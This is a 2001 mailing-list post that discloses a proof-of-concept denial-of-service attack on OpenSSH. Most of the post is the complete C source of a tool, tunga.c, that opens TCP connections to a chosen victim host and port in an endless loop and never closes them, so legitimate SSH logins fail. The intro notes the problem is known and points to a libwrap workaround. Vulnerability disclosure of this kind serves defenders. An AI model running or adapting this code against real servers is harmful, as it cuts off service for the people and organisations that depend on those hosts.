Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Possible OpenSSH DoS Attack

From: "Pedro Inacio" <drbrain () phibernet org>
Date: Mon, 10 Dec 2001 23:19:18 -0000
--[ OpenSSH DoS Attack proof of concept ]--
  by DrBrain <drbrain () phibernet org> / http://www.phibernet.org


--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a
DoS attack that gives you the following message when you try to contact the
service:

----------
$ ssh user () somehost com
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code bellow, because when you stop
running it everything works fine.

It seems to be a known problem (
http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there
is no patch available and this problem is present in all OpenSSH versions.

Although, there is an advisory to compile the SSH server with libwrap
(TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in
order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines where vulnerable.
In my opinion it is urgent to fix this as soon as possible.

--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrain () phibernet org>\n");
    printf("Phibernet Information Network < http://www.phibernet.org

\n\n");

    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);
}


That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for
helping me with some machines while testing the DoS.

-- DrBrain
"If you don't have a hammer, hack it" ;)
Previous By Date Next
Previous By Thread Next

Current thread: